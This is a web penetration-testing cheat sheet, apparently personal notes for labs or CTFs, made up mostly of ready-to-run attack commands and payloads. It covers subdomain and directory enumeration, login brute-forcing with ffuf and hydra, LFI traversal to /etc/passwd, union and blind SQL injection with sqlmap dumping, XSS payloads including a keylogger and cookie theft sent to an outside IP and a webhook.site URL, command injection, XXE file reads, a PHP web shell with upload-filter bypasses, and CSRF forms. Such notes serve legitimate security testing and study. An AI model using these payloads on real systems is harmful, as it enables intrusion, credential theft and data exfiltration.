Subdomain Enumeration
Dorks
site:site.com filetype:pdf- *crt.sh - search through certificates**
%.site.comAsset finder: https://github.com/tomnomnom/assetfinder
assetfinder <DOMAIN>assetfinder <DOMAIN> | grep <DOMAIN> | sort -uamass
amass enum -d <DOMAIN>httpprobe
cat <SUBDOMAINSLIST> | grep <domain> | sort -u | httpprobe -prefer-https | grep httpsDirectory Fuzzing
ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u <URL>/FUZZffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u <URL>/FUZZ -recursionffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u <URL>/FUZZ -fc 200dirb
dirb <URL> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtdirb <URL> -X .htmlferoxbuster
feroxbuster -u http://example.com -x php,html,htm,asp,aspxdirsearch
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e php,txt,html -f -u http://example.comBrute-Force
ffuf
- Save request “copy to file” from burp - Replace “password” param with “FUZZ”
- Run with no filter, determine invalid response size, add
fs <SIZE>, re-run command
ffuf -request r.txt -fs <SIZE> -request-proto http -w /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt:FUZZfuff - fuzz all permutations of multiple parameters (clusterbomb)
- Modify the request with two keywords, append them to the proper wordlists
ffuf -request r.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt:FUZZPASS -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSERhydra
hydra -V -L ../wordlists/users.txt -P ../wordlists/pass.txt 192.168.187.133 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie\: PHPSESSID=XXXXX; security=low"IDOR
ffuf
- if you have UIDs (can be anything)
-mr= regex match
ffuf -u <http://example.com/info.php?account=FUZZ> -w <UIDLIST> -mr 'admin'API
Post data
curl -X POST -k <ENDPOINT> -d '{key:"value"}'proxy through burp
curl -X POST -k --proxy http://localhost:8080 <ENDPOINT> -d '{key:"value"}'LFI
List of payloads
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File Inclusion/README.md
Non-recursive filter bypass
http://example.com/read.php?file=..././..././..././..././..././..././etc/passwdMangle capitals & operators for filter bypasses
http://example.com/read.php?file=..././..././..././..././..././..././eTc/p+AsS+wdPHP Wrappers
- Leak php instead of executing it.
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.phpffuf
- Copy request to file via burp
ffuf -request r -request-proto http -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txtFilter by wordcount
ffuf -request r -request-proto http -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fw 19,20SQL Injection
Think outside the box for injectable parameters. Anything that could be passed to a db is worth testing against. ie UAs, cookies, etc…
Basic
Logical or
' OR 1=1-- -Union - Enum number of columns
' union select null#
' union select null,null#
' union select null,null,null#Now that you know number of columns, return any query results
' union select null,null,version()#' union select null,null,table_name from information_schema.tables#' union select null,null,<COLUMN> from <TABLE>#Column types must match in union select.
' union select null(int),1,null,null from <table>#https://portswigger.net/web-security/sql-injection/cheat-sheet
Blind
manual logical value extraction
- Compare results against passed char, if response does not change, we have a valid char
Cookie: session=2345234r346326sdfsg' and substring((select version()), 1, 1) = '7'#Cookie: session=2345234r346326sdfsg' and substring((select version()), 1, 2) = '7.'#
Cookie: session=2345234r346326sdfsg' and substring((select version()), 1, 3) = '7.0'#
Cookie: session=2345234r346326sdfsg' and substring((select version()), 1, 5) = '7.0.3'#sqlmap
sqlmap -r r --level=2sqlmap -r r --level=2 --dumpsqlmap -r r --level=2 -T <TABLENAME> --dumpSecond-order
Injection achieved when query is executed not at the injection point, but when the query is retrieved.
- Signup endpoint, you signup with the user
' or 1=1-- -and the query only returns data when you navigate to the “accounts” page after your user is created.
XSS
Test html injection first, usually this is a good indicator (JS = you might need to bypass filter)
<h1>test</h1>Payloads
<script>alert()</script><script>print()</script><script>prompt("string")</script>You need to trigger XSS if not executed on page load
<img src=x onerror="prompt(1)">Redirect
<img src=x onerror="window.location.href='<https://example.com>'">script tag filter
<img src=x onerror=print()><scri<script>pt>prompt(1)<scri</scr</script>ipt>Keylogger
function logKey(event){console.log(event.key)} document.addEventListener('keydown', logKey)Stored
Steal admin cookie (classic)
<script>fetch("<http://192.168.187.130:9999/>" + document.cookie)</script><script>var i = new Image; i.src="https://webhook.site/9b3374bf-b997-4021-a302-de75a26fd841/?"+document.cookie;</script>Command Injection
https://book.hacktricks.xyz/pentesting-web/command-injection
Payloads
; whoami; whoami ;; whoami ; #Close logic via our controlled input, then execute
awk 'BEGIN {print sqrt(((-2)^2) + ((-3)^2))}'3)^2))}';whoami;#Blind
http://LOCALHIP>:PORT/?=`whoami`HEAD /?=www-data HTTP/1.1Server-Side Template Injection (SSTI)
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- First try to generate an error to leak the templating engine
- Use hacktricks payloads for execution
External Entity Injection (XXE)
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE Injection
Check for XXE if an application is references XML formatted data
Basic payload
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>Ensure you’re following the applications expected format
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><password>pass</password></creds>Insecure File Uploads
<?php system($_GET['cmd']); ?>Client-Side
- Intercept request, modify filetype, and filename, and replace data, send modified request
Server-Side Bypasses
extensions
shell.php.png
shell.php%00.png
shell.phtml
shell.inc
shell.php3
shell.php4
shell.php5Content-Type
kinda uselessmagic bytes
https://en.wikipedia.org/wiki/List_of_file_signatures
- Intercept request, insert php below magic bytes header, change filetype to php, and send
Cross-Site Request Forgery (CSRF)
<!-- original payload generated from BURP Suite Pro -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://<target-site>/api/employees/add" method=POST>
<input type="hidden" name="name" value="<payload-info>" />
<input type="hidden" name="email" value="<payload-info>" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html><!-- requires user interaction -->
<a href="http://<target-site>m/api/employees/add?name=<payload-info>">Click Me</a><!-- doesn't require user interaction -->
<img src="http:/<target-site>/api/employees/add?name=<payload-info>">document.location = 'https://<target-site>/employees/add?name=<payload-info>';WAF Fingerprinting
wafw00f
wafw00f <URL>Input known bad payload to understand WAF response
Input known good payload to understand standard response